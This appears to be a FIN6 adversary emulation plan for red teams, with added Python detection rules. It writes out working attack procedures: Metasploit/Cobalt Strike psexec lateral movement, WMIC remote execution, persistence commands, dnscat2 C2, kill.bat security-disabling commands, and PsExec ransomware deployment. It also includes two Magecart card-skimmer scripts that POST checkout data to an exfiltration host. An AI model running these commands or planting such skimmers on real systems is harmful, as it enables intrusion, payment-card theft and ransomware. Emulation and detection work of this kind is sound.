During Discovery, FIN6 identifies systems of interest. Depending on your organization's use case, this could be a Point of Sale (POS) system, an E-commerce site, or hosts on which to emulate a ransomware event. FIN6 has deployed POS malware via popular penetration testing frameworks and executed these tools with the Windows Management Instrumentation (WMI) Command-Line Utility (WMIC). FIN6 is reported to have compromised E-commerce environments both by injecting Magecart scripts into third-party JavaScript libraries and by directly attacking web servers. To deploy ransomware, the group copies its tools to an internal server, uses BAT files for deployment, and uses WMI or PsExec for execution.
- You have accomplished the enabling objectives of Phase 1 (compromise, discover, and escalate), have identified your organization's use case (POS, E-commerce/web, ransomware), and are prepared to pursue Phase 2 objectives.
- Your objectives for Phase 2 are to deploy, execute, and persist an operational capability on a system of interest identified during Discovery.
- The operational capability should be deployed with the intent of assessing the likelihood of exfiltrating POS data, harvesting payment information from a web server, or deploying ransomware.
This section describes lateral movement to the systems of interest identified during Discovery. FIN6 has moved laterally using RDP and legitimate but compromised credentials to console into remote targets, then used the system's command line to run a PowerShell one-liner that stages either a Meterpreter payload or Cobalt Strike's Beacon.[4] The group has also made extensive use of these frameworks' lateral movement capabilities to expand access using their built-in psexec commands.[4] FIN6 uses lateral movement to establish a point of presence on systems of interest, prepare the environment, and deploy its operational capabilities.
The operational capability we will be emulating for this scenario is POS malware. You are encouraged to use a memory scraper of your choosing. We have opted to use mem_scraper. This PowerShell script continuously dumps a process's memory and scrapes it for track data. So as to remain operationally representative (name-wise), we used PS2EXE to compile the script into Assistant32.exe.[5][7]
Additional file names (T1036.005) used by FIN6 include:[5]
logmesvc.exe, ttfmgr.exe, powershell.exe, dspsvc.exe, logmeinlauncher.exe, POSreport.exe, and PnPXAssoc.exe
Additional service names (T1036.004) used by FIN6 in persisting POS malware:[5]
#{AV} Management Instrumentation, BFHlpr / Base Filtering Helper, hdmsvc / Windows Hardware Management Driver, TrueType Fonts Management Service, and LogMeInServer
Metasploit PsExec - PowerShell (T1059.001)
FIN6 Procedure
msf> use exploit/windows/smb/psexec
msf exploit(psexec) > set Target PowerShell
msf exploit(psexec) > set RHost #{POS system}
msf exploit(psexec) > set SMBDomain #{Domain}
msf exploit(psexec) > set SMBPass #{Password}
msf exploit(psexec) > set SMBUser #{User}
msf exploit(psexec) > exploit
FIN6 Procedure
beacon> jump psexec_psh #{POS system}
remote-exec wmi #{POS system}
meterpreter > upload #{Assistant32.exe} C:\Windows\temp
5.3 Executing the POS implant using WMIC (T1047)
FIN6 Procedure
wmic /node:#{"POS system"} process call create #{"executable"}
Example: wmic /node:"192.168.101.1" process call create "c:\windows\temp\Assistant32.exe -Proc iexplore"
Registry Run Keys (T1547.001)
FIN6 Procedure - DLL
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v #{ } /t REG_SZ /d "#{ } "C:\#{ }",#{ }" /f
Example: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Help Assistant" /t REG_SZ /d "rundll32.exe "C:\Windows\SysWOW64\0409\Assistant.dll",workerInstance" /f
Alternative Procedure - EXE
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Help Assistant" /t REG_SZ /d "C:\Windows\temp\Assistant32.exe" /f
Scheduled Task (T1053.005)
FIN6 Procedure - DLL
"C:\Windows\System32\schtasks.exe" /create /tn #{ } /tr "rundll32.exe "C:\#{ }",#{ }" /sc #{ } /ru System
Example: "C:\Windows\System32\schtasks.exe" /create /tn WindowsHelpAssistant /tr "rundll32.exe "C:\Windows\SysWOW64\0409\Assistant32.dll",workerInstance" /sc onstart /ru System
Alternative Procedure - EXE
Example: "C:\Windows\System32\schtasks.exe" /create /tn WindowsHelpAssistant /tr "c:\windows\temp\Assistant32.exe" /sc onstart /ru System
Service Creation (T1543.003)
FIN6 Procedure
sc create "Windows Help Assistant" binpath= "c:\windows\temp\Assistant32.exe" start= auto obj= LocalSystem
Alternative Procedure
ruby dnscat2.rb --dns="domain=#{ }" --no-cache
Example: ruby dnscat2.rb --dns="domain=example.com" --no-cache
Start-Dnscat2 -Domain #{dnscat2 server} -Exec cmd
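The procedures above (WMIC remote process creation, Run key, scheduled task, and service persistence) all leave process-creation telemetry on the target. The following Python is an added detection example written for this plan's editors, not part of the FIN6 plan or any vendor product: it runs a handful of rules over constructed records in the shape of Sysmon Event ID 1 / Security 4688 events (host, parent image, command line). The host names, the IP address, and the benign control entry are invented; the command lines mirror the ones documented in this section.

```python
import re

# Constructed sample records in the shape of process-creation telemetry
# (Sysmon Event ID 1 / Security 4688). Hosts and the benign entry are invented.
SAMPLE_EVENTS = [
    {"host": "WS01", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'wmic /node:"192.168.101.1" process call create "c:\windows\temp\Assistant32.exe -Proc iexplore"'},
    {"host": "POS01", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Help Assistant" /t REG_SZ /d "rundll32.exe "C:\Windows\SysWOW64\0409\Assistant.dll",workerInstance" /f'},
    {"host": "POS01", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /create /tn WindowsHelpAssistant /tr "c:\windows\temp\Assistant32.exe" /sc onstart /ru System'},
    {"host": "POS01", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'sc create "Windows Help Assistant" binpath= "c:\windows\temp\Assistant32.exe" start= auto obj= LocalSystem'},
    # The implant started remotely over WMI shows up as a child of WmiPrvSE.exe.
    {"host": "POS01", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": r"c:\windows\temp\Assistant32.exe -Proc iexplore"},
    # Benign control: an administrator's task pointing at Program Files must not alert.
    {"host": "WS02", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'schtasks /create /tn Backup /tr "C:\Program Files\Backup\backup.exe" /sc daily /ru SYSTEM'},
]

# Writable or unusual locations that a persistence entry should rarely point at
# (the SysWOW64\0409 directory comes from the plan's own example).
SUSPICIOUS_PATH = r"(?:\\windows\\temp\\|\\temp\\|\\appdata\\|\\programdata\\|\\users\\public\\|\\syswow64\\0409\\)"


def _cmd(pattern):
    """Build a rule that matches a regex against the command line."""
    rx = re.compile(pattern, re.IGNORECASE)
    return lambda ev: rx.search(ev["cmdline"]) is not None


def _wmi_spawned_from_suspicious_path(ev):
    """Executable launched by the WMI provider host from a suspicious directory."""
    return (ev["parent"].lower().endswith(r"\wmiprvse.exe")
            and re.search(SUSPICIOUS_PATH, ev["cmdline"], re.IGNORECASE) is not None)


RULES = [
    ("wmic_remote_process_create", _cmd(r"\bwmic(?:\.exe)?\b.*/node:.*\bprocess\s+call\s+create\b")),
    ("run_key_persistence", _cmd(r'\breg(?:\.exe)?"?\s+add\b.*\\currentversion\\run\b.*' + SUSPICIOUS_PATH)),
    ("schtask_system_suspicious_path", _cmd(r'\bschtasks(?:\.exe)?"?\s+/create\b.*' + SUSPICIOUS_PATH + r".*/ru\s+system\b")),
    ("service_suspicious_binpath", _cmd(r'\bsc(?:\.exe)?\s+create\b.*binpath=\s*"?[^"]*' + SUSPICIOUS_PATH)),
    ("wmi_spawned_from_suspicious_path", _wmi_spawned_from_suspicious_path),
]


def evaluate(events):
    """Return (host, rule) pairs in event order; one event may trip several rules."""
    hits = []
    for ev in events:
        for name, rule in RULES:
            if rule(ev):
                hits.append((ev["host"], name))
    return hits


if __name__ == "__main__":
    for host, rule in evaluate(SAMPLE_EVENTS):
        print(host, rule)
```

The path list is the tuning knob: the rules fire on the combination of a persistence primitive and a location an administrator would not normally use, so the benign scheduled task under Program Files stays quiet while every entry in this section, including the implant spawned under WmiPrvSE.exe, is flagged.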
FIN6 is suspected of being responsible for the Magecart Group 6 activity.[10] Magecart Group 6 targets high-volume E-commerce sites and exfiltrates payment data to infrastructure that mimics that of the victim. The group had a great deal of success injecting Magecart scripts into legitimate third-party JavaScript libraries, thereby compromising the check-out process for thousands of E-commerce companies.[10] FIN6 is also suspected of accomplishing enabling objectives in order to move laterally throughout an organization with the intent of gaining access to web servers.[13] Once on a web server, the group modifies libraries to include custom Magecart scripts.
For organizations that are not in favor of injecting scripts into operational payment servers, we recommend the following: assess your ability to move laterally within your network from a "compromised" host to the payment server; assess your ability to gain unauthorized access to the server and write to it; and simulate exfiltration by manually issuing an HTTP POST containing simulated credit card information to your exfiltration server.
FIN6 Procedure
msf> use exploit/windows/smb/psexec
msf exploit(psexec) > set Target PowerShell
msf exploit(psexec) > set RHost #{POS system}
msf exploit(psexec) > set SMBDomain #{Domain}
msf exploit(psexec) > set SMBPass #{Password}
msf exploit(psexec) > set SMBUser #{User}
msf exploit(psexec) > exploit -j
FIN6 Procedure
beacon> jump psexec_psh #{Web Server}
remote-exec wmi #{Web Server}
FIN6 is suspected of compromising the web server responsible for hosting British Airways and modifying a JavaScript library to include the customized script detailed below.
British Airways [14]
window.onload = function() {
    // Fires when the customer presses the payment submit button (mouse or touch).
    jQuery("#submitButton").bind("mouseup touchend", function(a) {
        var n = {};
        // Collect every field of the payment form into a name/value map.
        jQuery("#paymentForm").serializeArray().map(function(a) {
            n[a.name] = a.value
        });
        var e = document.getElementById("personPaying").innerHTML;
        n.person = e;
        var t = JSON.stringify(n);
        // Send the serialized form to the attacker-controlled host shortly after the click.
        setTimeout(function() {
            jQuery.ajax({
                type: "POST",
                async: !0,
                url: #{"MaliciousExfilServer.com"},
                data: t,
                dataType: "application/json"
            })
        }, 500)
    })
};
FIN6 is suspected of operating in a similar manner against Newegg. The web server was compromised and the following script was integrated into the checkout process on the Newegg payment processing page.
Newegg [15]
window.onload = function() {
    // Fires when the customer presses the credit card payment button.
    jQuery('#btnCreditCard.paymentBtn.creditcard').bind("mouseup touchend", function(e) {
        var dati = jQuery('#checkout');
        // Serialize the whole checkout form, including card data.
        var pdati = JSON.stringify(dati.serializeArray());
        // Send it to the attacker-controlled host shortly after the click.
        setTimeout(function() {
            jQuery.ajax({
                type: "POST",
                async: true,
                url: #{"MaliciousExfilServer.com"},
                data: pdati,
                dataType: 'application/json'
            });
        }, 250);
    });
};
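Both skimmers above share one shape: a handler bound to the payment button, a serialization of the checkout form, and an HTTP POST to a host the site does not own. Two controls follow from that. First, a pinned Subresource Integrity (SRI) hash makes the browser refuse a third-party library whose body has been altered. Second, a review of served script bodies can look for that three-part pattern and for host names outside the site's own. The Python below is an added example for this plan and is not part of the FIN6 plan or of any real library: the "checkout helper" library is a constructed stand-in, the appended skimmer is a condensed version of the pattern shown above, and the host name exfil.example.invalid is a placeholder rather than a real indicator.

```python
import base64
import hashlib
import hmac
import re

# Constructed stand-in for a third-party checkout helper library (not a real
# library). A site would pin exactly this content with an SRI hash.
CLEAN_LIB = """(function () {
  window.checkoutHelpers = {
    formatCard: function (n) { return n.split(' ').join(''); }
  };
})();
"""

# The same library with a skimmer appended, condensed from the pattern the
# plan documents (hook the pay button, serialize the form, POST it elsewhere).
# The host name is a placeholder, not a real indicator.
INJECTED_LIB = CLEAN_LIB + """window.onload = function () {
  jQuery('#btnCreditCard').bind("mouseup touchend", function (e) {
    var p = JSON.stringify(jQuery('#checkout').serializeArray());
    setTimeout(function () {
      jQuery.ajax({ type: "POST", url: "https://exfil.example.invalid/collect", data: p });
    }, 250);
  });
};
"""


def sri_hash(content):
    """sha384 Subresource Integrity value, as used in <script integrity="...">."""
    digest = hashlib.sha384(content.encode("utf-8")).digest()
    return "sha384-" + base64.b64encode(digest).decode("ascii")


def verify_sri(content, expected):
    """True only if the served script body still matches the pinned hash."""
    return hmac.compare_digest(sri_hash(content), expected)


# Behavioural indicators of the skimmer pattern. Each alone is common in
# legitimate code; the combination on one page is what matters.
PAYMENT_HOOK = re.compile(r"\.(?:bind|on)\(\s*['\"][^'\"]*(?:mouseup|touchend|click|submit)", re.IGNORECASE)
FORM_HARVEST = re.compile(r"serializeArray\(\)|new\s+FormData\(", re.IGNORECASE)
POST_CALL = re.compile(r"\.ajax\(|fetch\(|XMLHttpRequest|sendBeacon\(", re.IGNORECASE)
URL_LITERAL = re.compile(r"https?://([A-Za-z0-9.-]+)")


def find_skimmer_indicators(js, allowed_hosts):
    """Return sorted indicator labels found in a script body."""
    findings = []
    if PAYMENT_HOOK.search(js) and FORM_HARVEST.search(js) and POST_CALL.search(js):
        findings.append("payment_handler_serializes_form_and_posts")
    for host in sorted(set(URL_LITERAL.findall(js))):
        if host.lower() not in allowed_hosts:
            findings.append("unexpected_host:" + host)
    return findings


if __name__ == "__main__":
    pinned = sri_hash(CLEAN_LIB)
    print("clean library passes SRI:", verify_sri(CLEAN_LIB, pinned))
    print("injected library passes SRI:", verify_sri(INJECTED_LIB, pinned))
    print(find_skimmer_indicators(INJECTED_LIB, {"shop.example.com"}))
```

The SRI check is the stronger control because the browser enforces it before a single byte of the script runs; the indicator scan is a review aid for libraries the site cannot pin (for example, ones the third party updates in place), and the allowed-host set should contain only the origins the checkout page is expected to talk to.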
For organizations interested in emulating FIN6's use of ransomware, the group is believed to have compromised and configured internal servers as distribution nodes. Ransomware was hosted on these "deployment servers" together with a BAT file (kill.bat) that disables security products and prepares hosts for compromise. Additional BAT files were used to distribute both the ransomware and kill.bat. These files were then executed by way of WMIC or PsExec.[4][12]
You are encouraged to use a ransomware simulator of your choosing. We have opted to use SimulateRansomware. This simple PowerShell script creates an "EncryptionTest" directory under the My Documents path, creates two files, and writes random ASCII characters to them to simulate file open/close activity. So as to remain operationally representative (name-wise), we used PS2EXE to compile the script into sss.exe.[12]
7.1 Copy the kill script (kill.bat/windows.bat), the distribution scripts (xaa.bat, xab.bat, xac.bat, etc.), and the ransomware (sss.exe) to the distribution server. (T1047, T1059.003) [4][12]
wmic /node:#{Ransomware recipient} /user:#{"domain\username"} /password:#{"password"} process call create "cmd.exe /c copy \\#{internal IP}\c$\windows\temp\sss.exe c:\windows\temp\"
kill.bat disables security products and alters firewall configuration using binaries native to Windows. (T1562.001, T1562.004)
Strings from kill.bat:
net stop #{ }
sc config #{ } start=disabled
taskkill /IM #{ } /F
netsh #{ }
FIN6 Procedure
copy sss.exe \\#{Distribution Server}\c$\windows\temp\
FIN6 Procedure
copy xaa.bat \\#{Distribution Server}\c$\windows\temp\
FIN6 Procedure
copy windows.bat \\#{Distribution Server}\c$\windows\temp\
copy kill.bat \\#{Distribution Server}\c$\windows\temp\
FIN6 Procedure
wmic /node:#{internal_IP} /user:#{"domain\username"} /password:#{"password"} process call create "cmd.exe /c copy \\#{distribution_server}\c$\windows\temp\sss.exe c:\windows\temp\"
FIN6 Procedure
wmic /node:#{internal_IP} /user:#{"domain\username"} /password:#{"password"} process call create "cmd.exe /c copy \\#{distribution_server}\c$\windows\temp\windows.bat or kill.bat c:\windows\temp\"
7.3 Execute the kill script and then the ransomware.[12]
WMIC (T1047)
FIN6 Procedure
wmic /node:#{Ransomware recipient} /user:#{"domain\username"} /password:#{"password"} process call create "cmd /c c:\windows\temp\windows.bat" or "kill.bat"
FIN6 Procedure
wmic /node:#{Ransomware recipient} /user:#{"domain\username"} /password:#{"password"} process call create "cmd /c c:\windows\temp\sss.exe"
PsExec (T1569.002)
FIN6 has used the -r option to change the default remote service name in order to avoid detection. The group is believed to have named the remote services "mstdc" or "rtrsd".[4] The command below authenticates over SMB, executes a command or binary, and returns the results locally.
FIN6 Procedure
psexec.exe \\#{internal IP} -u #{"domain\username"} -p #{"password"} -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat or kill.bat
FIN6 Procedure
psexec.exe \\#{internal IP} -u #{"domain\username"} -p #{"password"} -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe
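The two pieces of this deployment that defenders can key on are the kill script, which produces a burst of net stop, sc config, taskkill and netsh commands on one host within seconds, and PsExec's service installation, which registers a service under the chosen -r name. The Python below is an added detection example for this plan, not part of the FIN6 plan or of any product. It assumes process-creation records carry a host, a timestamp and a command line, and that service-install records (System log Event ID 7045) carry a service name and image path; the hosts, timestamps, the "ExampleAV" product and the "ExampleBackup" service are all constructed. It also assumes, based on PsExec's documented behaviour, that the -r name becomes both the service name and the executable dropped into the system root, so a service whose binary sits directly under %SystemRoot% is treated as PsExec-like even when the name is not one of the two the plan reports.

```python
import re
from collections import defaultdict

# Commands kill.bat is reported to use (net stop, sc config, taskkill, netsh),
# each reduced to a regex over the command line.
TAMPER_PATTERNS = [
    ("service_stop", re.compile(r"\bnet1?(?:\.exe)?\s+stop\b", re.IGNORECASE)),
    ("service_disabled", re.compile(r"\bsc(?:\.exe)?\s+config\b.*\bstart=\s*disabled\b", re.IGNORECASE)),
    ("forced_kill", re.compile(r"\btaskkill(?:\.exe)?\b.*\s/f\b", re.IGNORECASE)),
    ("firewall_change", re.compile(r"\bnetsh(?:\.exe)?\s+(?:advfirewall|firewall)\b", re.IGNORECASE)),
]

# Constructed process-creation records (host, epoch seconds, command line).
# "ExampleAV" is an invented product name standing in for the plan's #{ } placeholders.
PROCESS_EVENTS = [
    {"host": "POS02", "ts": 1000, "cmdline": "net stop ExampleAV"},
    {"host": "POS02", "ts": 1001, "cmdline": "sc config ExampleAV start=disabled"},
    {"host": "POS02", "ts": 1002, "cmdline": "taskkill /IM exampleav.exe /F"},
    {"host": "POS02", "ts": 1003, "cmdline": "netsh advfirewall set allprofiles state off"},
    {"host": "POS02", "ts": 1010, "cmdline": r"c:\windows\temp\sss.exe"},
    # Control: an administrator restarting the spooler twice, fifteen minutes apart.
    {"host": "WS03", "ts": 2000, "cmdline": "net stop Spooler"},
    {"host": "WS03", "ts": 2900, "cmdline": "net stop Spooler"},
]

# Constructed service-install records in the shape of System Event ID 7045.
SERVICE_INSTALLS = [
    {"host": "POS02", "ts": 990, "service": "rtrsd", "image": r"%SystemRoot%\rtrsd.exe"},
    {"host": "WS03", "ts": 3000, "service": "ExampleBackup", "image": r"C:\Program Files\ExampleBackup\svc.exe"},
]

# Default PsExec service name plus the two names the plan attributes to FIN6.
KNOWN_PSEXEC_NAMES = {"psexesvc", "rtrsd", "mstdc"}


def tamper_bursts(events, window=60, threshold=3):
    """Hosts on which at least `threshold` distinct tampering actions occur within `window` seconds."""
    by_host = defaultdict(list)
    for ev in events:
        for name, rx in TAMPER_PATTERNS:
            if rx.search(ev["cmdline"]):
                by_host[ev["host"]].append((ev["ts"], name))
    alerts = {}
    for host, hits in by_host.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            kinds = {kind for ts, kind in hits[i:] if ts - t0 <= window}
            if len(kinds) >= threshold:
                alerts[host] = sorted(kinds)
                break
    return alerts


def suspicious_service_installs(installs):
    """(host, service) pairs whose install looks like PsExec, renamed or not."""
    out = []
    for ev in installs:
        name = ev["service"].lower()
        image = ev["image"].lower().replace("%systemroot%", r"c:\windows")
        # Assumption (see lead-in): PsExec drops <name>.exe directly under the system root.
        in_system_root = re.fullmatch(r"c:\\windows\\[^\\]+\.exe", image) is not None
        if name in KNOWN_PSEXEC_NAMES or in_system_root:
            out.append((ev["host"], ev["service"]))
    return out


if __name__ == "__main__":
    print(tamper_bursts(PROCESS_EVENTS))
    print(suspicious_service_installs(SERVICE_INSTALLS))
```

Correlating the two results on the same host (a PsExec-style service install followed within a minute by a tampering burst, then an executable launched from a temp directory) gives a high-confidence picture of this section's procedure; either signal alone is worth a ticket on a POS or payment host, where administrators rarely disable security services interactively.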